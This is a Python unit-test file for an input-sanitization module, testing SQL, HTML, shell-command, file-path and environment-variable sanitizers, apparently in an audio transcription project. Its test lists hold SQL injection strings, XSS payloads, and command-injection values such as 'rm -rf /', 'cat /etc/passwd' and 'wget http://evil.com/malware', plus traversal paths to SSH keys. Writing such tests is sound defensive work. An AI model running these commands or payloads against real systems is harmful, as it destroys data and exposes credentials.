512 lines
17 KiB
Python
512 lines
17 KiB
Python
"""Unit tests for input sanitization and secure configuration handling."""
|
|
|
|
import json
|
|
import tempfile
|
|
import os
|
|
import shutil
|
|
from pathlib import Path
|
|
from typing import Dict, Any
|
|
|
|
import pytest
|
|
|
|
from src.security.input_sanitization import (
|
|
sanitize_sql_input,
|
|
sanitize_html_input,
|
|
sanitize_command_input,
|
|
sanitize_file_path,
|
|
sanitize_config_value,
|
|
validate_config_schema,
|
|
sanitize_search_query,
|
|
sanitize_environment_variable,
|
|
InputSanitizationError,
|
|
ConfigValidationError,
|
|
)
|
|
|
|
|
|
class TestSQLInputSanitization:
|
|
"""Test SQL input sanitization functions."""
|
|
|
|
def test_sanitize_sql_input_removes_sql_injection(self):
|
|
"""Test that SQL injection attempts are sanitized."""
|
|
malicious_inputs = [
|
|
"'; DROP TABLE users; --",
|
|
"' OR '1'='1",
|
|
"'; INSERT INTO users VALUES ('hacker', 'password'); --",
|
|
"admin'--",
|
|
"'; UPDATE users SET password='hacked'; --",
|
|
]
|
|
|
|
for malicious_input in malicious_inputs:
|
|
sanitized = sanitize_sql_input(malicious_input)
|
|
assert "DROP" not in sanitized
|
|
assert "INSERT" not in sanitized
|
|
assert "UPDATE" not in sanitized
|
|
assert "DELETE" not in sanitized
|
|
assert ";" not in sanitized
|
|
assert "--" not in sanitized
|
|
assert "/*" not in sanitized
|
|
assert "*/" not in sanitized
|
|
|
|
def test_sanitize_sql_input_preserves_safe_input(self):
|
|
"""Test that safe input is preserved."""
|
|
safe_inputs = [
|
|
"normal text",
|
|
"user123",
|
|
"search query",
|
|
"file_name.txt",
|
|
"path/to/file",
|
|
]
|
|
|
|
for safe_input in safe_inputs:
|
|
sanitized = sanitize_sql_input(safe_input)
|
|
assert sanitized == safe_input
|
|
|
|
def test_sanitize_sql_input_handles_edge_cases(self):
|
|
"""Test edge cases for SQL input sanitization."""
|
|
# Empty input
|
|
assert sanitize_sql_input("") == ""
|
|
assert sanitize_sql_input(None) == ""
|
|
|
|
# Whitespace only
|
|
assert sanitize_sql_input(" ") == " "
|
|
|
|
# Very long input
|
|
long_input = "a" * 1000
|
|
sanitized = sanitize_sql_input(long_input)
|
|
assert len(sanitized) <= 1000
|
|
|
|
def test_sanitize_sql_input_raises_error_for_critical_attacks(self):
|
|
"""Test that critical SQL injection attempts raise errors."""
|
|
critical_attacks = [
|
|
"'; DROP DATABASE; --",
|
|
"'; SHUTDOWN; --",
|
|
"'; EXEC xp_cmdshell; --",
|
|
]
|
|
|
|
for attack in critical_attacks:
|
|
with pytest.raises(InputSanitizationError):
|
|
sanitize_sql_input(attack)
|
|
|
|
|
|
class TestHTMLInputSanitization:
|
|
"""Test HTML input sanitization functions."""
|
|
|
|
def test_sanitize_html_input_removes_xss_attempts(self):
|
|
"""Test that XSS attempts are sanitized."""
|
|
xss_attempts = [
|
|
"<script>alert('xss')</script>",
|
|
"<img src=x onerror=alert('xss')>",
|
|
"javascript:alert('xss')",
|
|
"<iframe src='http://evil.com'></iframe>",
|
|
"<svg onload=alert('xss')>",
|
|
]
|
|
|
|
for xss_attempt in xss_attempts:
|
|
sanitized = sanitize_html_input(xss_attempt)
|
|
assert "<script>" not in sanitized
|
|
assert "javascript:" not in sanitized
|
|
assert "onerror=" not in sanitized
|
|
assert "onload=" not in sanitized
|
|
assert "<iframe" not in sanitized
|
|
|
|
def test_sanitize_html_input_preserves_safe_html(self):
|
|
"""Test that safe HTML is preserved."""
|
|
safe_html = [
|
|
"<p>Normal paragraph</p>",
|
|
"<strong>Bold text</strong>",
|
|
"<em>Italic text</em>",
|
|
"<a href='https://example.com'>Link</a>",
|
|
]
|
|
|
|
for html in safe_html:
|
|
sanitized = sanitize_html_input(html)
|
|
# Should preserve the original tag
|
|
if "<p>" in html:
|
|
assert "<p>" in sanitized
|
|
elif "<strong>" in html:
|
|
assert "<strong>" in sanitized
|
|
elif "<em>" in html:
|
|
assert "<em>" in sanitized
|
|
elif "<a>" in html:
|
|
assert "<a>" in sanitized
|
|
|
|
def test_sanitize_html_input_handles_edge_cases(self):
|
|
"""Test edge cases for HTML input sanitization."""
|
|
# Empty input
|
|
assert sanitize_html_input("") == ""
|
|
assert sanitize_html_input(None) == ""
|
|
|
|
# Plain text
|
|
assert sanitize_html_input("plain text") == "plain text"
|
|
|
|
# Mixed content
|
|
mixed = "Normal text <script>alert('xss')</script> more text"
|
|
sanitized = sanitize_html_input(mixed)
|
|
assert "<script>" not in sanitized
|
|
assert "Normal text" in sanitized
|
|
assert "more text" in sanitized
|
|
|
|
|
|
class TestCommandInputSanitization:
|
|
"""Test command input sanitization functions."""
|
|
|
|
def test_sanitize_command_input_removes_command_injection(self):
|
|
"""Test that command injection attempts are sanitized."""
|
|
injection_attempts = [
|
|
"file.txt; rm -rf /",
|
|
"file.txt && rm -rf /",
|
|
"file.txt | rm -rf /",
|
|
"file.txt; cat /etc/passwd",
|
|
"file.txt; wget http://evil.com/malware",
|
|
]
|
|
|
|
for attempt in injection_attempts:
|
|
sanitized = sanitize_command_input(attempt)
|
|
assert ";" not in sanitized
|
|
assert "&&" not in sanitized
|
|
assert "|" not in sanitized
|
|
assert "rm -rf" not in sanitized
|
|
assert "cat /etc" not in sanitized
|
|
assert "wget" not in sanitized
|
|
|
|
def test_sanitize_command_input_preserves_safe_commands(self):
|
|
"""Test that safe command input is preserved."""
|
|
safe_commands = [
|
|
"file.txt",
|
|
"path/to/file",
|
|
"filename with spaces.txt",
|
|
"file-name_123.txt",
|
|
]
|
|
|
|
for command in safe_commands:
|
|
sanitized = sanitize_command_input(command)
|
|
assert sanitized == command
|
|
|
|
def test_sanitize_command_input_handles_edge_cases(self):
|
|
"""Test edge cases for command input sanitization."""
|
|
# Empty input
|
|
assert sanitize_command_input("") == ""
|
|
assert sanitize_command_input(None) == ""
|
|
|
|
# Whitespace only
|
|
assert sanitize_command_input(" ") == " "
|
|
|
|
|
|
class TestFilePathSanitization:
|
|
"""Test file path sanitization functions."""
|
|
|
|
def test_sanitize_file_path_removes_dangerous_paths(self):
|
|
"""Test that dangerous file paths are sanitized."""
|
|
dangerous_paths = [
|
|
"../../../etc/passwd",
|
|
"/etc/passwd",
|
|
"/root/.ssh/id_rsa",
|
|
"C:\\Windows\\System32\\config\\SAM",
|
|
"~/.ssh/id_rsa",
|
|
]
|
|
|
|
for path in dangerous_paths:
|
|
sanitized = sanitize_file_path(path)
|
|
assert ".." not in sanitized
|
|
assert "/etc/" not in sanitized
|
|
assert "/root/" not in sanitized
|
|
assert "System32" not in sanitized
|
|
assert ".ssh" not in sanitized
|
|
|
|
def test_sanitize_file_path_preserves_safe_paths(self):
|
|
"""Test that safe file paths are preserved."""
|
|
safe_paths = [
|
|
"file.txt",
|
|
"path/to/file.txt",
|
|
"subdirectory/file.txt",
|
|
"file with spaces.txt",
|
|
]
|
|
|
|
for path in safe_paths:
|
|
sanitized = sanitize_file_path(path)
|
|
assert sanitized == path
|
|
|
|
def test_sanitize_file_path_handles_edge_cases(self):
|
|
"""Test edge cases for file path sanitization."""
|
|
# Empty input
|
|
assert sanitize_file_path("") == ""
|
|
assert sanitize_file_path(None) == ""
|
|
|
|
# Current directory
|
|
assert sanitize_file_path(".") == "."
|
|
assert sanitize_file_path("./file.txt") == "./file.txt"
|
|
|
|
|
|
class TestConfigValueSanitization:
|
|
"""Test configuration value sanitization functions."""
|
|
|
|
def test_sanitize_config_value_validates_types(self):
|
|
"""Test that configuration values are properly typed."""
|
|
# String values
|
|
assert sanitize_config_value("string", str) == "string"
|
|
assert sanitize_config_value("123", str) == "123"
|
|
|
|
# Integer values
|
|
assert sanitize_config_value("123", int) == 123
|
|
assert sanitize_config_value(123, int) == 123
|
|
|
|
# Boolean values
|
|
assert sanitize_config_value("true", bool) is True
|
|
assert sanitize_config_value("false", bool) is False
|
|
assert sanitize_config_value(True, bool) is True
|
|
|
|
# Float values
|
|
assert sanitize_config_value("123.45", float) == 123.45
|
|
assert sanitize_config_value(123.45, float) == 123.45
|
|
|
|
def test_sanitize_config_value_handles_invalid_types(self):
|
|
"""Test that invalid types raise errors."""
|
|
with pytest.raises(ConfigValidationError):
|
|
sanitize_config_value("not_a_number", int)
|
|
|
|
with pytest.raises(ConfigValidationError):
|
|
sanitize_config_value("not_a_bool", bool)
|
|
|
|
with pytest.raises(ConfigValidationError):
|
|
sanitize_config_value("not_a_float", float)
|
|
|
|
def test_sanitize_config_value_enforces_bounds(self):
|
|
"""Test that configuration values respect bounds."""
|
|
# Integer bounds
|
|
assert sanitize_config_value("50", int, min_value=0, max_value=100) == 50
|
|
|
|
with pytest.raises(ConfigValidationError):
|
|
sanitize_config_value("-1", int, min_value=0, max_value=100)
|
|
|
|
with pytest.raises(ConfigValidationError):
|
|
sanitize_config_value("101", int, min_value=0, max_value=100)
|
|
|
|
# Float bounds
|
|
assert sanitize_config_value("0.5", float, min_value=0.0, max_value=1.0) == 0.5
|
|
|
|
with pytest.raises(ConfigValidationError):
|
|
sanitize_config_value("-0.1", float, min_value=0.0, max_value=1.0)
|
|
|
|
def test_sanitize_config_value_handles_edge_cases(self):
|
|
"""Test edge cases for configuration value sanitization."""
|
|
# None values
|
|
with pytest.raises(ConfigValidationError):
|
|
sanitize_config_value(None, str)
|
|
|
|
# Empty strings
|
|
with pytest.raises(ConfigValidationError):
|
|
sanitize_config_value("", str)
|
|
|
|
|
|
class TestConfigSchemaValidation:
|
|
"""Test configuration schema validation functions."""
|
|
|
|
def test_validate_config_schema_validates_required_fields(self):
|
|
"""Test that required fields are validated."""
|
|
schema = {
|
|
"type": "object",
|
|
"required": ["api_key", "base_url"],
|
|
"properties": {
|
|
"api_key": {"type": "string"},
|
|
"base_url": {"type": "string"},
|
|
"timeout": {"type": "integer", "default": 30}
|
|
}
|
|
}
|
|
|
|
valid_config = {
|
|
"api_key": "secret_key",
|
|
"base_url": "https://api.example.com"
|
|
}
|
|
|
|
# Should not raise error
|
|
validate_config_schema(valid_config, schema)
|
|
|
|
# Missing required field should raise error
|
|
invalid_config = {"api_key": "secret_key"}
|
|
with pytest.raises(ConfigValidationError):
|
|
validate_config_schema(invalid_config, schema)
|
|
|
|
def test_validate_config_schema_validates_field_types(self):
|
|
"""Test that field types are validated."""
|
|
schema = {
|
|
"type": "object",
|
|
"properties": {
|
|
"timeout": {"type": "integer"},
|
|
"enabled": {"type": "boolean"},
|
|
"url": {"type": "string"}
|
|
}
|
|
}
|
|
|
|
valid_config = {
|
|
"timeout": 30,
|
|
"enabled": True,
|
|
"url": "https://example.com"
|
|
}
|
|
|
|
# Should not raise error
|
|
validate_config_schema(valid_config, schema)
|
|
|
|
# Invalid type should raise error
|
|
invalid_config = {
|
|
"timeout": "not_a_number",
|
|
"enabled": True,
|
|
"url": "https://example.com"
|
|
}
|
|
with pytest.raises(ConfigValidationError):
|
|
validate_config_schema(invalid_config, schema)
|
|
|
|
def test_validate_config_schema_handles_nested_objects(self):
|
|
"""Test that nested objects are validated."""
|
|
schema = {
|
|
"type": "object",
|
|
"properties": {
|
|
"database": {
|
|
"type": "object",
|
|
"properties": {
|
|
"host": {"type": "string"},
|
|
"port": {"type": "integer"}
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
valid_config = {
|
|
"database": {
|
|
"host": "localhost",
|
|
"port": 5432
|
|
}
|
|
}
|
|
|
|
# Should not raise error
|
|
validate_config_schema(valid_config, schema)
|
|
|
|
# Invalid nested type should raise error
|
|
invalid_config = {
|
|
"database": {
|
|
"host": "localhost",
|
|
"port": "not_a_number"
|
|
}
|
|
}
|
|
with pytest.raises(ConfigValidationError):
|
|
validate_config_schema(invalid_config, schema)
|
|
|
|
|
|
class TestSearchQuerySanitization:
|
|
"""Test search query sanitization functions."""
|
|
|
|
def test_sanitize_search_query_removes_sql_injection(self):
|
|
"""Test that search queries are protected from SQL injection."""
|
|
malicious_queries = [
|
|
"'; DROP TABLE users; --",
|
|
"' OR '1'='1",
|
|
"admin'--",
|
|
]
|
|
|
|
for query in malicious_queries:
|
|
sanitized = sanitize_search_query(query)
|
|
assert "DROP" not in sanitized
|
|
assert "OR" not in sanitized
|
|
assert "--" not in sanitized
|
|
|
|
def test_sanitize_search_query_preserves_safe_queries(self):
|
|
"""Test that safe search queries are preserved."""
|
|
safe_queries = [
|
|
"transcription",
|
|
"audio file",
|
|
"podcast episode",
|
|
"lecture notes",
|
|
]
|
|
|
|
for query in safe_queries:
|
|
sanitized = sanitize_search_query(query)
|
|
assert sanitized == query
|
|
|
|
def test_sanitize_search_query_handles_special_characters(self):
|
|
"""Test that special characters are handled properly."""
|
|
queries_with_special_chars = [
|
|
"file-name.txt",
|
|
"path/to/file",
|
|
"file with spaces",
|
|
"file@domain.com",
|
|
]
|
|
|
|
for query in queries_with_special_chars:
|
|
sanitized = sanitize_search_query(query)
|
|
# Should preserve most special characters but remove dangerous ones
|
|
assert ";" not in sanitized
|
|
assert "--" not in sanitized
|
|
|
|
|
|
class TestEnvironmentVariableSanitization:
|
|
"""Test environment variable sanitization functions."""
|
|
|
|
def test_sanitize_environment_variable_removes_dangerous_chars(self):
|
|
"""Test that dangerous characters are removed from env var names."""
|
|
dangerous_names = [
|
|
"PATH; rm -rf /",
|
|
"HOME && rm -rf /",
|
|
"USER | rm -rf /",
|
|
]
|
|
|
|
for name in dangerous_names:
|
|
sanitized = sanitize_environment_variable(name)
|
|
assert ";" not in sanitized
|
|
assert "&&" not in sanitized
|
|
assert "|" not in sanitized
|
|
|
|
def test_sanitize_environment_variable_preserves_safe_names(self):
|
|
"""Test that safe environment variable names are preserved."""
|
|
safe_names = [
|
|
"API_KEY",
|
|
"DATABASE_URL",
|
|
"LOG_LEVEL",
|
|
"DEBUG_MODE",
|
|
]
|
|
|
|
for name in safe_names:
|
|
sanitized = sanitize_environment_variable(name)
|
|
assert sanitized == name
|
|
|
|
def test_sanitize_environment_variable_handles_edge_cases(self):
|
|
"""Test edge cases for environment variable sanitization."""
|
|
# Empty input
|
|
assert sanitize_environment_variable("") == ""
|
|
assert sanitize_environment_variable(None) == ""
|
|
|
|
# Whitespace only
|
|
assert sanitize_environment_variable(" ") == " "
|
|
|
|
|
|
class TestInputSanitizationIntegration:
|
|
"""Integration tests for input sanitization."""
|
|
|
|
def test_comprehensive_sanitization_pipeline(self):
|
|
"""Test that all sanitization functions work together."""
|
|
malicious_input = "'; DROP TABLE users; -- <script>alert('xss')</script>"
|
|
|
|
# Apply all sanitization functions
|
|
sql_safe = sanitize_sql_input(malicious_input)
|
|
html_safe = sanitize_html_input(sql_safe)
|
|
command_safe = sanitize_command_input(html_safe)
|
|
|
|
# Should be safe after all sanitization
|
|
assert "DROP" not in command_safe
|
|
assert "<script>" not in command_safe
|
|
assert ";" not in command_safe
|
|
assert "--" not in command_safe
|
|
|
|
def test_sanitization_preserves_legitimate_content(self):
|
|
"""Test that legitimate content is preserved through sanitization."""
|
|
legitimate_input = "Search for audio files in /path/to/files"
|
|
|
|
# Apply all sanitization functions
|
|
sql_safe = sanitize_sql_input(legitimate_input)
|
|
html_safe = sanitize_html_input(sql_safe)
|
|
command_safe = sanitize_command_input(html_safe)
|
|
|
|
# Should preserve the core content
|
|
assert "Search" in command_safe
|
|
assert "audio" in command_safe
|
|
assert "files" in command_safe
|
|
assert "path" in command_safe
|